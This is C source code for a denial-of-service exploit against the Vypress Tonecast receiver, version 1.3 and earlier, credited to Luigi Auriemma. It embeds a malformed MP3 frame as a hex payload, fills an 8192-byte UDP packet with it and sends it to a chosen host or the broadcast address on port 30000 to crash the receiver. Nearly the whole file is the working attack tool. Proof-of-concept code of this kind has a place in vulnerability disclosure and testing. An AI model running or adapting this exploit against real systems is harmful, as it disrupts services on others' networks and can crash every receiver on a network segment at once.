/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>
#endif



#define VER     "0.1"
#define PORT    30000
#define BCAST   "255.255.255.255"
#define MAXSZ   8192    /* don't modify */
#define PCK     /* this a piece of a MP3 file causing the crash, but the program reads mp2 */ \
                "\xFF\xFF\x41\xA7\x74\x80\x50\x04\x00\x38\x00\x00\x00\x03\x81\xC0" \
                "\x00\x00\x30\x14\x01\x5B\x28\xEE\xFF\xE6\x3F\xBF\xFF\xFF\xFF\xFF" \
                "\xFF\x9B\xD1\x7F\xFF\xFF\xA2\x8F\x7D\xF3\xCB\xBD\xF7\xDE\x69\xA6" \
                "\x5C\x0C\x12\xF0\x33\xBE\xE7\xAC\x29\x11\x14\x18\x12\x3A\x97\xDD" \
                "\x20\xC0\x28\x93\xFB\x8F\x4B\x01\x2D\x93\x9C\x8A\x9F\xEA\x52\xB1" \
                "\x59\xE3\x2D\x61\xC8\x61\xFF\xEF\x0A\x62\xA0\xC3\x47\xAF\x16\x4C" \
                "\x46\x65\xDD\x67\xC7\xD5\xB4\x53\x71\x61\xAD\xD4\xD7\x62\xB2\x97" \
                "\x65\x7E\xB1\xC2\xE5\xE7\xFA\xEE\xBD\x76\x38\xAE\xF3\x84\x83\xE5" \
                "\x90\x58\x68\x39\x98\xBB\x6F\xBA\x9A\xA4\x9A\xEC\x86\xC1\xA0\xD7" \
                "\x7F\x7F\xCF\xF4\x24\x38\x69\x0C\x92\xA8\x82\x88\x0E\xEA\xC5\x78" \
                "\x8B\x97\x62\x3A\xFC\x61\x04\x43\x0F\x20\xA9\x04\x41\x86\xB1\xFE" \
                "\x67\xF8\x6B\x5F\x94\x8D\x29\xD8\x12\xD0\x4E\x78\x5A\xED\x4C\xE6" \
                "\x2A\x4C\x05\x6C\x6E\x6F\xAB\x37\x5F\xCE\x4B\x59\x73\x85\x94\xF3" \
                "\x24\x5A\xAB\x96\x75\xC4\x53\xEF\x0F\xF3\xBD\xD7\x77\x96\xBF\x7F" \
                "\xB7\x51\xA7\xB3\xA7\xE6\x18\x6F\x27\xA9\x14\xC2\x1D\xCD\xB5\x67" \
                "\x69\x87\x07\x3A\x6F\xDD\xAB\xCA\xC0\xD3\x59\x62\xC0\x2C\x56\x1A" \
                "\xFA\x46\x1B\x9C\x51\x72\x32\xC5\x88\xE9\xAE\x9F\xD7\xEF\x7A\xFF" \
                "\xE6\x5A\xE6\xBF\xF9\xD7\xB3\x07\x2E\xA3\x91\x14\x86\x21\x97\x5E" \
                "\xA5\x79\x44\xA2\xA4\xE7\xFF\xFF\xFC\x79\xAE\xA0\x3A\x15\x65\xF5" \
                "\x6B\x8E\xAC\x6F\x56\x5C\x5A\x06\xA0\xCF\x7E\x86\x9B\x3A\x20\x72" \
                "\x61\xC1\x68\xB4\x5C\x36\x1B\x0F\xC5\xC2\x50\xD0\x48\x48\x87\xA0" \
                "\x88\xF1\x04\xB9\xAD\xA8\x7E\x7A\x26\x4A\x46\x7F\xE5\x12\x88\x2E" \
                "\x09\x15\xFF\xE8\x13\x62\x43\x53\x35\x3B\xB5\xCF\xFF\xFE\x84\x59" \
                "\xA1\xC6\x06\x63\xC4\x00\xE2\x9A\x89\xFF\xFF\xFF\x93\x3C\xC2\xCB" \
                "\x29\xE5\x79\xB8\xA3\x4E\x2E\xC8\xA4\x87\xFF\xFF\xFF\xF5\x2D\x51" \
                "\xF7\xE3\xB7\x6D\x6E\x9C\xC3\x45\xD1\xE1\x9F\xD7\x00\x3C\x1F\x01" \
                "\x8B\x1B\x38\x93\x24\xDB\x4B\xBF\xF3\x46\xF5\xB3\xFD\x61\x22\xEA" \
                "\x0C\x96\xA5\xFF\xFB\x78\x60\x01\x80\x03\xC3\x51\xE1\x6E\x24\x60" \
                "\x00\x25\x80\x5B\x45\xC1\x00\x00\x91\x75\xDF\x79\xBC\x93\x00\x28" \
                "\x92\x85\x6B\x57\x8E\x20\x02\x7A\xD9\x7B\x95\xCB\x25\x4E\x27\x13" \
                "\x8E\x64\x94\x23\xD0\x3D\x26\xAE\x4D\xEE\xDD\xE6\xEE\x2C\x46\x4A" \
                "\x28\x1D\x28\xF4\x28\x29\x90\xCE\x79\x23\x02\x29\xCD\x48\xAB\x5E" \
                "\x04\x01\x41\x26\x71\xF2\xB9\x1C\xE9\x70\xE3\x31\x64\x45\x23\x65" \
                "\x0C\x8D\x9B\x2C\xBB\x72\x79\xC6\xAD\x30\x6A\xA4\x6B\x03\x13\xEC" \
                "\xD5\xF8\xDD\x79\xF0\xA3\xE8\xDB\xE8\x45\xF5\x88\xFB\x30\xC0\xF1" \
                "\xD2\x02\x80\x61\x94\xF6\x27\x3C\xE4\x3D\x4C\x88\xCE\x07\x81\x41" \
                "\x50\x0A\x3A\x4F\x17\x1A\x8F\xDE\x82\xC4\x54\x79\x40\x40\x00\x00" \
                "\x01\x22\xC1\x91\x6B\xEE\xDD\x2A\x77\xD5\xF6\xAB\xF1\xF7\x27\xF4" \
                "\x75\x29\x1F\xFC\x2F\x4E\x9F\xEF\xFC\x4B\x66\x8F\xDF\xFF\xF6\x1E" \
                "\xB8\x32\xC5\xD2\x5B\xA4\x49\xC8\x93\x9D\x31\x01\x08\x44\x1C\x01" \
                "\x57\x12\x2A\xC1\x56\xDA\x8D\x35\x3C\x7C\x33\x25\xE7\xC3\xC5\x4B" \
                "\xDE\x63\xFD\x9C\xAC\x67\x97\x7C\xEE\x76\xA2\xA3\xBC\x4F\xA6\xBC" \
                "\xD3\xBF\x2F\x30\xAB\x78\x4A\x9B\xDC\xC4\xA1\x87\x79\x64\x72\xDD" \
                "\x9C\x8F\xFF\x3E\x77\xED\x4D\xBB\xEF\xEF\xE6\x14\xEC\xFA\xEE\xCD" \
                "\xD5\xB1\x75\xCE\x7F\x3A\x5E\xFA\x9D\xA6\xA7\x41\xDA\x66\xE9\xB9" \
                "\xCF\xE6\x92\xDF\x25\xDB\x2E\xDE\xDB\x73\x3E\x3C\xF6\x77\x89\xFB" \
                "\x76\xFD\xEF\x3E\x9D\x3D\xFF\x86\xBF\xE1\xDB\xF6\xAD\xFD\xE7\x6A" \
                "\xB9\x93\xB7\xBB\x3F\x7F\xD1\x09\x38\x29\x58\xBA\x3A\x60\x08\x00" \
                "\x2B\x04\x24\x50\xD5\xAD\xA7\x5B\xC4\x18\x3F\x55\x6D\xE3\xBD\x48" \
                "\x55\xDF\xFD\x5F\xA7\xF7\xF5\x7B\x35\x2B"



u_long resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer;
    int         sd,
                i,
                len;
    u_short     port = PORT;
    u_char      *buff;


    setbuf(stdout, NULL);

    fputs("\n"
        "Vypress Tonecast receiver <= 1.3 broadcast crash "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@altervista.org\n"
        "web:    http://aluigi.altervista.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\n"
            "Usage: %s <host> [port(%d)]\n"
            "\n"
            " Note: you can launch this tool also versus a broadcast IP\n"
            "\n", argv[0], PORT);
        exit(1);
    }

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    if(argc > 2) port = atoi(argv[2]);

    if(!memcmp(argv[1], BCAST, sizeof(BCAST) - 1)) {
        peer.sin_addr.s_addr = 0xffffffffL;
    } else {
        peer.sin_addr.s_addr = resolv(argv[1]);
    }
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target %s:%hu\n",
        inet_ntoa(peer.sin_addr),
        port);

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

    i = 1;  /* broadcast */
    if(setsockopt(sd, SOL_SOCKET, SO_BROADCAST, (char *)&i, sizeof(i))
     < 0) std_err();

    len = MAXSZ + sizeof(PCK) - 1;  /* avoid buffer problems */
    buff = malloc(len);
    if(!buff) std_err();

    for(i = 0; i < MAXSZ; i += sizeof(PCK) - 1) {
        memcpy(buff + i, PCK, sizeof(PCK) - 1);
    }

    fputs("- send BOOM data\n", stdout);
    if(sendto(sd, buff, MAXSZ, 0, (struct sockaddr *)&peer, sizeof(peer))
      < 0) std_err();

    close(sd);
    fputs("- finished\n\n", stdout);
    return(0);
}



u_long resolv(char *host) {
    struct hostent *hp;
    u_long host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u_long *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


